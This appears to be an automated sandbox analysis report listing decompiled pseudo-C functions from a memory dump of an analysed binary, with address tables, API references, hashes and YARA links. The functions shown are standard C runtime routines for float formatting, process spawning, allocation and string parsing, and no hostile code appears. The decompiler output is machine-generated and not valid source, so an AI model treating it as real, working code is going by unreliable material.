Function 00877E6B, Relevance: 6.0, APIs: 4, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00877E6B(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t29 = __edx;
				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E0087775D(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E00877844(_t29, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E00877D7E(__ebx, __edx, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E00877CBD(__ebx, __edx, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

0x00877e6b
0x00877e70
0x00877e76
0x00877ee9
0x00000000
0x00877e7d
0x00877e7d
0x00877e80
0x00877e9b
0x00877e9e
0x00877ebe
0x00877ed0
0x00877ea0
0x00877ea0
0x00877ea3
0x00000000
0x00877ea5
0x00877eb7
0x00877eb7
0x00877ea3
0x00877eee
0x00877ef2
0x00877e82
0x00877e9a
0x00877e9a
0x00877e80

APIs

__cftof_l.LIBCMT ref: 00877E91

Part of subcall function 00877CBD: __fltout2.LIBCMT ref: 00877CE8

__cftog_l.LIBCMT ref: 00877EB7
__cftoe_l.LIBCMT ref: 00877EE9

Memory Dump Source

Source File: 00000000.00000002.238704675.0000000000861000.00000020.00020000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.238701690.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238716910.000000000087F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238721704.0000000000885000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.238724265.0000000000886000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.238728449.000000000088C000.00000002.00020000.sdmp Download File

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction ID: 50480801d15ef23859563cf56a97c136736841bcd167f813ac30f42738c9ee60
Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction Fuzzy Hash: 3D11283200814EBBCF165F88CC418AE3F62FB19754B5984A5FA1C99139D336C9B1EB92

Uniqueness

Uniqueness Score: -1.00%

Function 00870331, Relevance: 6.0, APIs: 4, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00870331(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				char _v12;
				void* __esi;
				signed int _t15;
				void* _t19;
				void* _t25;

				_t31 = _a8;
				if(_a8 != 0) {
					__eflags = _a12;
					if(__eflags == 0) {
						goto L1;
					} else {
						_push(_a8);
						_t15 = E00879353(__edx, _a12, _a16,  &_v8,  &_v12);
						__eflags = _t15 - 0xffffffff;
						if(_t15 == 0xffffffff) {
							goto L2;
						} else {
							_push(_t25);
							_t19 = E0087914F(_t25, _a4, _a8, _v8, _v12);
							E0086A7A3(_v8);
							E0086A7A3(_v12);
							return _t19;
						}
					}
				} else {
					L1:
					 *((intOrPtr*)(E0086AF94(_t31))) = 0x16;
					_t15 = E0086F2F0();
					L2:
					return _t15 | 0xffffffff;
				}
			}

0x00870338
0x0087033c
0x00870353
0x00870357
0x00000000
0x00870359
0x00870359
0x0087036a
0x00870372
0x00870375
0x00000000
0x00870377
0x00870377
0x00870384
0x0087038e
0x00870396
0x008703a2
0x008703a2
0x00870375
0x0087033e
0x0087033e
0x00870343
0x00870349
0x0087034e
0x00870352
0x00870352

APIs

__cenvarg.LIBCMT ref: 0087036A
__dospawn.LIBCMT ref: 00870384
_free.LIBCMT ref: 0087038E
_free.LIBCMT ref: 00870396

Part of subcall function 0086AF94: __getptd_noexit.LIBCMT ref: 0086AF94

Memory Dump Source

Source File: 00000000.00000002.238704675.0000000000861000.00000020.00020000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.238701690.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238716910.000000000087F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238721704.0000000000885000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.238724265.0000000000886000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.238728449.000000000088C000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$__cenvarg__dospawn__getptd_noexit
String ID:
API String ID: 1016086714-0
Opcode ID: fb848ca0c17ab812555a0a729eb78381bec12ef49de99d49f7847baf107435e1
Instruction ID: 2960cc098e7245063e5109af7a63b97185ae0449b05f8392cd3a4fdb4559ef99
Opcode Fuzzy Hash: fb848ca0c17ab812555a0a729eb78381bec12ef49de99d49f7847baf107435e1
Instruction Fuzzy Hash: 0C01FB75800109FFCF01AFA8CC05ADE7A69FF04364F158660F928A52A5E775CA61EF62

Uniqueness

Uniqueness Score: -1.00%

Function 0086AD32, Relevance: 6.0, APIs: 4, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0086AD32(void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v0;
				char* _v8;
				char _v20;
				void* _t11;
				signed int _t12;
				void* _t16;
				void* _t28;
				void* _t29;
				void* _t31;

				_t31 = __esi;
				_t29 = __edi;
				_t28 = __edx;
				while(1) {
					_t11 = E0086DB65(_t28, _t29, _t31, _a4);
					if(_t11 != 0) {
						break;
					}
					_t12 = E00871638(_t11, _a4);
					__eflags = _t12;
					if(_t12 == 0) {
						__eflags =  *0x888b34 & 0x00000001;
						if(( *0x888b34 & 0x00000001) == 0) {
							 *0x888b34 =  *0x888b34 | 0x00000001;
							__eflags =  *0x888b34;
							_push(1);
							_v8 = "bad allocation";
							E0086A0F8(0x888b28,  &_v8);
							 *0x888b28 = 0x87f28c;
							E0086C127( *0x888b34, 0x87e3a3);
						}
						E0086A205( &_v20, 0x888b28);
						_v20 = 0x87f28c;
						E0086BA71( &_v20, 0x883954);
						asm("int3");
						__eflags =  *0x888b40 - 1;
						if(__eflags == 0) {
							E00871BE4(_t28, __eflags);
						}
						_t16 = E00871A35(_t28, _v0);
						E0086AA72(0xff);
						return _t16;
					} else {
						continue;
					}
					L10:
				}
				return _t11;
				goto L10;
			}

0x0086ad32
0x0086ad32
0x0086ad32
0x0086ad49
0x0086ad4c
0x0086ad54
0x00000000
0x00000000
0x0086ad3f
0x0086ad45
0x0086ad47
0x0086ad58
0x0086ad69
0x0086ad6b
0x0086ad6b
0x0086ad72
0x0086ad7a
0x0086ad81
0x0086ad8b
0x0086ad91
0x0086ad96
0x0086ad9b
0x0086ada9
0x0086adac
0x0086adb1
0x0086adb7
0x0086adbe
0x0086adc0
0x0086adc0
0x0086adc8
0x0086add2
0x0086adda
0x00000000
0x00000000
0x00000000
0x00000000
0x0086ad47
0x0086ad57
0x00000000

APIs

_malloc.LIBCMT ref: 0086AD4C

Part of subcall function 0086DB65: __FF_MSGBANNER.LIBCMT ref: 0086DB7E
Part of subcall function 0086DB65: __NMSG_WRITE.LIBCMT ref: 0086DB85
Part of subcall function 0086DB65: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,0086EB6E,?,00000001,?,?,0087111D,00000018,00883668,0000000C,008711AD), ref: 0086DBAA

std::exception::exception.LIBCMT ref: 0086AD81
std::exception::exception.LIBCMT ref: 0086AD9B
__CxxThrowException@8.LIBCMT ref: 0086ADAC

Memory Dump Source

Source File: 00000000.00000002.238704675.0000000000861000.00000020.00020000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.238701690.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238716910.000000000087F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238721704.0000000000885000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.238724265.0000000000886000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.238728449.000000000088C000.00000002.00020000.sdmp Download File

Similarity

API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
String ID:
API String ID: 615853336-0
Opcode ID: cff1daf520c8ec97b9d22d4a7621dea62d99ee55e48853cc0f98d6c9347ab945
Instruction ID: b9831e564d097001ca6b2a7400b9e89e8b6f4e1cffbb1b9ef5f8f5cad279334b
Opcode Fuzzy Hash: cff1daf520c8ec97b9d22d4a7621dea62d99ee55e48853cc0f98d6c9347ab945
Instruction Fuzzy Hash: 45F02D75940209AACB14EB5CDC46AAD7BA8FF84724F520029F514F6192DFB4C9488B43

Uniqueness

Uniqueness Score: -1.00%

Function 00864760, Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 426
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00864760(char __eax, signed int __ecx, signed int* __edx, void* __eflags, char* _a4, signed int _a8) {
				char _v5;
				char _v6;
				char _v7;
				char* _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v32;
				signed int _v36;
				char _v51;
				signed int* _v52;
				intOrPtr _v60;
				intOrPtr _v64;
				char _v80;
				void* __edi;
				void* __esi;
				void* _t149;
				void* _t150;
				intOrPtr _t152;
				char* _t156;
				signed int* _t157;
				signed int* _t158;
				void* _t160;
				signed int** _t161;
				signed int* _t162;
				intOrPtr _t164;
				signed int** _t165;
				signed int** _t166;
				signed char** _t168;
				signed int _t170;
				signed int _t173;
				intOrPtr* _t174;
				signed char* _t175;
				char* _t176;
				signed char** _t178;
				signed int _t180;
				signed int** _t184;
				signed int** _t185;
				signed char** _t195;
				signed int _t197;
				char* _t199;
				signed char** _t202;
				signed int _t204;
				signed char** _t206;
				signed int _t208;
				signed int _t210;
				signed int _t211;
				signed int _t213;
				intOrPtr _t214;
				char* _t215;
				intOrPtr _t221;
				signed int _t223;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				signed char** _t229;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr* _t239;
				intOrPtr _t249;
				intOrPtr* _t256;
				signed int _t257;
				signed int* _t258;
				void* _t259;
				void* _t260;

				_t210 = __ecx;
				_t258 = __edx;
				_t256 = E008676F0(__eax);
				_t260 = _t259 + 4;
				 *((intOrPtr*)( *((intOrPtr*)( *_t256 + 0xc))))( &_v80);
				if(_v64 != 0) {
					_v7 =  *((intOrPtr*)( *((intOrPtr*)( *_t256 + 8))))();
				} else {
					_v7 = 0;
				}
				_t257 = _a8;
				_v12 = _a4;
				_t149 = E00867BC0(_t257, _t258);
				if(_t149 != 0) {
					L29:
					_t211 = _t210 & 0x00000e00;
					if(_t211 != 0x400) {
						if(_t211 != 0x800) {
							asm("sbb ebx, ebx");
							_t213 =  ~_t211 & 0x0000000a;
						} else {
							_t213 = 0x10;
						}
						_v16 = _t213;
					} else {
						_v16 = 8;
						_t213 = _v16;
					}
					_v5 = 0;
					_v6 = 0;
					_t150 = E00867BC0(_t257, _t258);
					if(_t150 != 0) {
						L55:
						if(_t213 == 0) {
							goto L58;
						}
						goto L56;
					} else {
						if(_t258[1] != _t150) {
							L46:
							if(_t258[1] != 0x30) {
								goto L55;
							}
							_v5 = 1;
							E00866C20(_t258);
							if(E00867BC0(_t257, _t258) != 0 || E00866BD0(_t258) != 0x78 && E00866BD0(_t258) != 0x58 || _t213 != 0 && _t213 != 0x10) {
								if(_t213 != 0) {
									L56:
									if(_t213 == 0xa) {
										L58:
										_v24 = 0xa;
										goto L59;
									}
									goto L57;
								}
								_t213 = 8;
								_v16 = 8;
								goto L57;
							} else {
								_t213 = 0x10;
								_v16 = 0x10;
								_v5 = 0;
								E00866C20(_t258);
								L57:
								_t43 = _t213 - 8; // 0x0
								asm("sbb eax, eax");
								_v24 = ( ~_t43 & 0x0000000e) + 8;
								L59:
								_v32 = 0xf;
								_v52 = _v5;
								_v36 = 1;
								_v51 = 0;
								_v20 = 0;
								if(E00867BC0(_t257, _t258) != 0) {
									_t258 = _v52;
									_t214 = _v32;
									_t257 = _v20;
									L128:
									_t239 = _v80;
									if(_v60 < 0x10) {
										_t239 =  &_v80;
									}
									if(_v5 == 0) {
										L145:
										_t152 = _a4;
										goto L146;
									} else {
										while(_t257 != 0) {
											_t221 =  *_t239;
											if(_t221 == 0x7f) {
												break;
											}
											_t257 = _t257 - 1;
											if(_t257 == 0) {
												L137:
												if(_t257 != 0) {
													L141:
													if( *((char*)(_t239 + 1)) > 0) {
														_t239 = _t239 + 1;
													}
													continue;
												}
												_t158 = _t258;
												if(_t214 < 0x10) {
													_t158 =  &_v52;
												}
												if(_t221 <  *_t158) {
													goto L145;
												} else {
													goto L141;
												}
											}
											_t157 = _t258;
											if(_t214 < 0x10) {
												_t157 =  &_v52;
											}
											if(_t221 !=  *((intOrPtr*)(_t157 + _t257))) {
												goto L145;
											} else {
												goto L137;
											}
										}
										if(_v6 != 0) {
											L147:
											 *_v12 = 0;
											if(_t214 >= 0x10) {
												_push(_t258);
												E0086A99B();
												_t260 = _t260 + 4;
											}
											if(_v60 >= 0x10) {
												_push(_v80);
												E0086A99B();
											}
											return _v16;
										}
										_t156 = _v12;
										 *_t156 = 0x30;
										_t152 = _t156 + 1;
										L146:
										_v12 = _t152;
										goto L147;
									}
								}
								_t215 = _v12;
								do {
									if(_t258[1] != 0) {
										L71:
										 *_t215 = _t258[1];
										_t160 = E0086A7E0("0123456789abcdefABCDEF", _t258[1], _v24);
										_t260 = _t260 + 0xc;
										if(_t160 == 0) {
											_t161 = _v52;
											if(_v32 < 0x10) {
												_t161 =  &_v52;
											}
											_t223 = _v20;
											if( *((char*)(_t161 + _t223)) == 0) {
												break;
											} else {
												_t214 = _v7;
												if(_t214 == 0) {
													break;
												}
												if(_t258[1] != 0) {
													L96:
													if(_t258[1] != _t214) {
														break;
													}
													if((_t223 | 0xffffffff) - _v36 <= 1) {
														L125:
														E00869598("string too long");
														L126:
														_v5 = 0;
														goto L128;
													}
													_t226 = _v36;
													_t90 = _t226 + 1; // 0x2
													_t257 = _t90;
													if(_t257 > 0xfffffffe) {
														goto L125;
													}
													_t164 = _v32;
													if(_t164 >= _t257) {
														if(_t257 != 0) {
															L101:
															_t165 = _v52;
															if(_t164 < 0x10) {
																_t165 =  &_v52;
															}
															 *((char*)(_t226 + _t165)) = 0;
															_t166 = _v52;
															_v36 = _t257;
															if(_v32 < 0x10) {
																_t166 =  &_v52;
															}
															 *((char*)(_t257 + _t166)) = 0;
															L106:
															_v20 = _v20 + 1;
															_t257 = _a8;
															_t215 = _v12;
															L107:
															_t227 =  *_t258;
															if(_t227 == 0) {
																L118:
																 *_t258 = 0;
																_t258[1] = 1;
																goto L119;
															}
															if( *( *(_t227 + 0x20)) == 0) {
																L115:
																_t173 =  *((intOrPtr*)( *((intOrPtr*)( *_t227 + 0x1c))))();
																L116:
																if(_t173 == 0xffffffff) {
																	goto L118;
																}
																_t258[1] = 0;
																goto L119;
															}
															_t174 =  *((intOrPtr*)(_t227 + 0x30));
															if( *_t174 <= 0) {
																goto L115;
															}
															 *_t174 =  *_t174 - 1;
															_t229 =  *(_t227 + 0x20);
															_t175 =  *_t229;
															 *_t229 =  &(_t175[1]);
															_t173 =  *_t175 & 0x000000ff;
															goto L116;
														}
														_t176 = _v52;
														_v36 = _t257;
														if(_t164 < 0x10) {
															_t176 =  &_v52;
														}
														 *_t176 = 0;
														goto L106;
													}
													E00866E50( &_v52, _t257, _t226);
													_t164 = _v32;
													_t226 = _v36;
													if(_t257 == 0) {
														goto L106;
													}
													goto L101;
												}
												_t223 =  *_t258;
												if(_t223 == 0) {
													L94:
													 *_t258 = 0;
													L95:
													_t258[1] = 1;
													goto L96;
												}
												_t178 =  *(_t223 + 0x20);
												if( *_t178 == 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t223 + 0x30)))) <= 0) {
													_t180 =  *((intOrPtr*)( *((intOrPtr*)( *_t223 + 0x18))))();
												} else {
													_t180 =  *( *_t178) & 0x000000ff;
												}
												if(_t180 == 0xffffffff) {
													goto L94;
												} else {
													_t258[1] = _t180;
													goto L95;
												}
											}
										}
										if(_v6 != 0 ||  *_t215 != 0x30) {
											if(_t215 < _a4 + 0x1f) {
												_t215 = _t215 + 1;
												_v12 = _t215;
												_v6 = 1;
											}
										}
										_t249 = _v32;
										_t184 = _v52;
										_v5 = 1;
										if(_t249 < 0x10) {
											_t184 =  &_v52;
										}
										_t231 = _v20;
										if( *((char*)(_t184 + _t231)) != 0x7f) {
											_t185 = _v52;
											if(_t249 < 0x10) {
												_t185 =  &_v52;
											}
											 *((char*)(_t185 + _t231)) =  *((char*)(_t185 + _t231)) + 1;
										}
										goto L107;
									}
									_t228 =  *_t258;
									if(_t228 == 0) {
										L69:
										 *_t258 = 0;
										L70:
										_t258[1] = 1;
										goto L71;
									}
									_t168 =  *(_t228 + 0x20);
									if( *_t168 == 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t228 + 0x30)))) <= 0) {
										_t170 =  *((intOrPtr*)( *((intOrPtr*)( *_t228 + 0x18))))();
									} else {
										_t170 =  *( *_t168) & 0x000000ff;
									}
									if(_t170 == 0xffffffff) {
										goto L69;
									} else {
										_t258[1] = _t170;
										goto L70;
									}
									L119:
								} while (E00867BC0(_t257, _t258) == 0);
								_t257 = _v20;
								_t214 = _v32;
								_t258 = _v52;
								if(_t257 == 0) {
									goto L128;
								}
								_t162 = _t258;
								if(_t214 < 0x10) {
									_t162 =  &_v52;
								}
								if( *((char*)(_t162 + _t257)) <= 0) {
									goto L126;
								} else {
									_t257 = _t257 + 1;
									goto L128;
								}
							}
						}
						_t232 =  *_t258;
						if(_t232 == 0) {
							L44:
							 *_t258 = 0;
							L45:
							_t258[1] = 1;
							goto L46;
						}
						_t195 =  *(_t232 + 0x20);
						if( *_t195 == 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t232 + 0x30)))) <= 0) {
							_t197 =  *((intOrPtr*)( *((intOrPtr*)( *_t232 + 0x18))))();
						} else {
							_t197 =  *( *_t195) & 0x000000ff;
						}
						if(_t197 == 0xffffffff) {
							goto L44;
						} else {
							_t258[1] = _t197;
							goto L45;
						}
					}
				} else {
					if(_t258[1] != _t149) {
						L14:
						if(_t258[1] != 0x2b) {
							if(_t258[1] != 0) {
								L26:
								if(_t258[1] != 0x2d) {
									goto L29;
								}
								_t199 = _a4;
								 *_t199 = 0x2d;
								goto L28;
							}
							_t233 =  *_t258;
							if(_t233 == 0) {
								L24:
								 *_t258 = 0;
								L25:
								_t258[1] = 1;
								goto L26;
							}
							_t202 =  *(_t233 + 0x20);
							if( *_t202 == 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t233 + 0x30)))) <= 0) {
								_t204 =  *((intOrPtr*)( *((intOrPtr*)( *_t233 + 0x18))))();
							} else {
								_t204 =  *( *_t202) & 0x000000ff;
							}
							if(_t204 == 0xffffffff) {
								goto L24;
							} else {
								_t258[1] = _t204;
								goto L25;
							}
						} else {
							_t199 = _a4;
							 *_t199 = 0x2b;
							L28:
							_v12 = _t199 + 1;
							E00866C20(_t258);
							goto L29;
						}
					}
					_t234 =  *_t258;
					if(_t234 == 0) {
						L12:
						 *_t258 = 0;
						L13:
						_t258[1] = 1;
						goto L14;
					}
					_t206 =  *(_t234 + 0x20);
					if( *_t206 == 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t234 + 0x30)))) <= 0) {
						_t208 =  *((intOrPtr*)( *((intOrPtr*)( *_t234 + 0x18))))();
					} else {
						_t208 =  *( *_t206) & 0x000000ff;
					}
					if(_t208 == 0xffffffff) {
						goto L12;
					} else {
						_t258[1] = _t208;
						goto L13;
					}
				}
			}

0x0086476a
0x0086476c
0x00864773
0x0086477a
0x00864783
0x00864789
0x0086479a
0x0086478b
0x0086478b
0x0086478b
0x008647a0
0x008647a3
0x008647a6
0x008647ad
0x00864851
0x00864851
0x0086485d
0x00864871
0x0086487c
0x0086487e
0x00864873
0x00864873
0x00864873
0x00864881
0x0086485f
0x0086485f
0x00864866
0x00864866
0x00864884
0x00864888
0x0086488c
0x00864893
0x0086492a
0x0086492c
0x00000000
0x00000000
0x00000000
0x00864899
0x0086489c
0x008648d6
0x008648da
0x00000000
0x00000000
0x008648dc
0x008648e0
0x008648ec
0x0086491e
0x0086492e
0x00864931
0x00864945
0x00864945
0x00000000
0x00864945
0x00000000
0x00864931
0x00864920
0x00864925
0x00000000
0x00864909
0x00864909
0x0086490e
0x00864911
0x00864915
0x00864933
0x00864933
0x00864938
0x00864940
0x0086494c
0x0086494f
0x00864956
0x00864959
0x00864960
0x00864964
0x00864972
0x00864b8c
0x00864b8f
0x00864b92
0x00864b95
0x00864b99
0x00864b9c
0x00864b9e
0x00864b9e
0x00864ba5
0x00864bee
0x00864bee
0x00000000
0x00864ba7
0x00864ba7
0x00864bab
0x00864bb0
0x00000000
0x00000000
0x00864bb2
0x00864bb3
0x00864bc4
0x00864bc6
0x00864bd6
0x00864bda
0x00864bdc
0x00864bdc
0x00000000
0x00864bda
0x00864bc8
0x00864bcd
0x00864bcf
0x00864bcf
0x00864bd4
0x00000000
0x00000000
0x00000000
0x00000000
0x00864bd4
0x00864bb5
0x00864bba
0x00864bbc
0x00864bbc
0x00864bc2
0x00000000
0x00000000
0x00000000
0x00000000
0x00864bc2
0x00864be3
0x00864bf4
0x00864bf7
0x00864bfd
0x00864bff
0x00864c00
0x00864c05
0x00864c05
0x00864c0c
0x00864c11
0x00864c12
0x00864c17
0x00864c23
0x00864c23
0x00864be5
0x00864be8
0x00864beb
0x00864bf1
0x00864bf1
0x00000000
0x00864bf1
0x00864ba5
0x00864978
0x0086497b
0x0086497f
0x008649b9
0x008649c9
0x008649cb
0x008649d0
0x008649d5
0x00864a2a
0x00864a2d
0x00864a2f
0x00864a2f
0x00864a32
0x00864a39
0x00000000
0x00864a3f
0x00864a3f
0x00864a44
0x00000000
0x00000000
0x00864a4e
0x00864a88
0x00864a8b
0x00000000
0x00000000
0x00864a9a
0x00864b7c
0x00864b81
0x00864b86
0x00864b86
0x00000000
0x00864b86
0x00864aa0
0x00864aa3
0x00864aa3
0x00864aa9
0x00000000
0x00000000
0x00864aaf
0x00864ab4
0x00864b1e
0x00864aca
0x00864acd
0x00864ad0
0x00864ad2
0x00864ad2
0x00864ad5
0x00864add
0x00864ae0
0x00864ae3
0x00864ae5
0x00864ae5
0x00864ae8
0x00864aec
0x00864aec
0x00864aef
0x00864af2
0x00864af5
0x00864af5
0x00864af9
0x00864b45
0x00864b45
0x00864b4b
0x00000000
0x00864b4b
0x00864b01
0x00864b33
0x00864b38
0x00864b3a
0x00864b3d
0x00000000
0x00000000
0x00864b3f
0x00000000
0x00864b3f
0x00864b03
0x00864b09
0x00000000
0x00000000
0x00864b0b
0x00864b0d
0x00864b10
0x00864b15
0x00864b17
0x00000000
0x00864b17
0x00864b23
0x00864b26
0x00864b29
0x00864b2b
0x00864b2b
0x00864b2e
0x00000000
0x00864b2e
0x00864abb
0x00864ac0
0x00864ac3
0x00864ac8
0x00000000
0x00000000
0x00000000
0x00864ac8
0x00864a50
0x00864a54
0x00864a7e
0x00864a7e
0x00864a84
0x00864a84
0x00000000
0x00864a84
0x00864a56
0x00864a5c
0x00864a72
0x00864a66
0x00864a68
0x00864a68
0x00864a77
0x00000000
0x00864a79
0x00864a79
0x00000000
0x00864a79
0x00864a77
0x00864a39
0x008649db
0x008649ea
0x008649ec
0x008649ed
0x008649f0
0x008649f0
0x008649ea
0x008649f4
0x008649f7
0x008649fa
0x00864a01
0x00864a03
0x00864a03
0x00864a06
0x00864a0d
0x00864a13
0x00864a19
0x00864a1b
0x00864a1b
0x00864a1e
0x00864a1e
0x00000000
0x00864a0d
0x00864981
0x00864985
0x008649af
0x008649af
0x008649b5
0x008649b5
0x00000000
0x008649b5
0x00864987
0x0086498d
0x008649a3
0x00864997
0x00864999
0x00864999
0x008649a8
0x00000000
0x008649aa
0x008649aa
0x00000000
0x008649aa
0x00864b4f
0x00864b54
0x00864b5c
0x00864b5f
0x00864b62
0x00864b67
0x00000000
0x00000000
0x00864b69
0x00864b6e
0x00864b70
0x00864b70
0x00864b77
0x00000000
0x00864b79
0x00864b79
0x00000000
0x00864b79
0x00864b77
0x008648ec
0x0086489e
0x008648a2
0x008648cc
0x008648cc
0x008648d2
0x008648d2
0x00000000
0x008648d2
0x008648a4
0x008648aa
0x008648c0
0x008648b4
0x008648b6
0x008648b6
0x008648c5
0x00000000
0x008648c7
0x008648c7
0x00000000
0x008648c7
0x008648c5
0x008647b3
0x008647b6
0x008647f0
0x008647f4
0x00864802
0x0086483c
0x00864840
0x00000000
0x00000000
0x00864842
0x00864845
0x00000000
0x00864845
0x00864804
0x00864808
0x00864832
0x00864832
0x00864838
0x00864838
0x00000000
0x00864838
0x0086480a
0x00864810
0x00864826
0x0086481a
0x0086481c
0x0086481c
0x0086482b
0x00000000
0x0086482d
0x0086482d
0x00000000
0x0086482d
0x008647f6
0x008647f6
0x008647f9
0x00864848
0x00864849
0x0086484c
0x00000000
0x0086484c
0x008647f4
0x008647b8
0x008647bc
0x008647e6
0x008647e6
0x008647ec
0x008647ec
0x00000000
0x008647ec
0x008647be
0x008647c4
0x008647da
0x008647ce
0x008647d0
0x008647d0
0x008647df
0x00000000
0x008647e1
0x008647e1
0x00000000
0x008647e1
0x008647df

APIs

Part of subcall function 008676F0: std::_Lockit::_Lockit.LIBCPMT ref: 008676FE
Part of subcall function 008676F0: std::_Lockit::_Lockit.LIBCPMT ref: 0086771A

std::_Xinvalid_argument.LIBCPMT ref: 00864B81

Strings

0123456789abcdefABCDEF, xrefs: 008649C4
string too long, xrefs: 00864B7C

Memory Dump Source

Source File: 00000000.00000002.238704675.0000000000861000.00000020.00020000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.238701690.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238716910.000000000087F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238721704.0000000000885000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.238724265.0000000000886000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.238728449.000000000088C000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$LockitLockit::_$Xinvalid_argument
String ID: 0123456789abcdefABCDEF$string too long
API String ID: 2828073007-58337362
Opcode ID: f9a968759949ba3bf4a8ce5b37566d845d29bc54b49c1223e44ab82ef2fda083
Instruction ID: 2a73539133e41fa83105e0b79bb2aedd37e8e96e32057ac1056f2d0bb15885be
Opcode Fuzzy Hash: f9a968759949ba3bf4a8ce5b37566d845d29bc54b49c1223e44ab82ef2fda083
Instruction Fuzzy Hash: 7902C5309042889FDB21CFA8C480BAEBBB1FF46314F26A598D492DB392D775DD85CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00863DD0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00863DD0(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t15;
				intOrPtr* _t16;
				char* _t22;
				intOrPtr* _t27;
				intOrPtr* _t28;
				intOrPtr _t33;
				intOrPtr _t38;
				intOrPtr _t47;
				intOrPtr* _t52;

				_t33 = _a4;
				_t52 = __ecx;
				if(_t33 == 0) {
					L12:
					_t47 = _a8;
					if(_t47 > 0xfffffffe) {
						E00869598("string too long");
					}
					_t15 =  *((intOrPtr*)(_t52 + 0x14));
					if(_t15 >= _t47) {
						if(_t47 != 0) {
							goto L16;
						} else {
							 *((intOrPtr*)(_t52 + 0x10)) = _t47;
							if(_t15 < 0x10) {
								_t22 = _t52;
								 *_t22 = 0;
								return _t22;
							} else {
								 *((char*)( *_t52)) = 0;
								return _t52;
							}
						}
					} else {
						E00866E50(_t52, _t47,  *((intOrPtr*)(_t52 + 0x10)));
						if(_t47 == 0) {
							L26:
							return _t52;
						} else {
							L16:
							if( *((intOrPtr*)(_t52 + 0x14)) < 0x10) {
								_t16 = _t52;
							} else {
								_t16 =  *_t52;
							}
							E0086B710(_t16, _t33, _t47);
							 *((intOrPtr*)(_t52 + 0x10)) = _t47;
							if( *((intOrPtr*)(_t52 + 0x14)) < 0x10) {
								 *((char*)(_t52 + _t47)) = 0;
								goto L26;
							} else {
								 *((char*)( *_t52 + _t47)) = 0;
								return _t52;
							}
						}
					}
				} else {
					_t38 =  *((intOrPtr*)(__ecx + 0x14));
					if(_t38 < 0x10) {
						_t27 = __ecx;
					} else {
						_t27 =  *__ecx;
					}
					if(_t33 < _t27) {
						goto L12;
					} else {
						if(_t38 < 0x10) {
							_t28 = _t52;
						} else {
							_t28 =  *_t52;
						}
						if( *((intOrPtr*)(_t52 + 0x10)) + _t28 <= _t33) {
							goto L12;
						} else {
							if(_t38 < 0x10) {
								return E00865AE0(_t52, _t52, _t33 - _t52, _a8);
							} else {
								return E00865AE0(_t52, _t52, _t33 -  *_t52, _a8);
							}
						}
					}
				}
			}

0x00863dd4
0x00863dd8
0x00863ddc
0x00863e37
0x00863e38
0x00863e3e
0x00863e45
0x00863e45
0x00863e4a
0x00863e4f
0x00863e6d
0x00000000
0x00863e6f
0x00863e6f
0x00863e75
0x00863e86
0x00863e89
0x00863e8e
0x00863e77
0x00863e7a
0x00863e82
0x00863e82
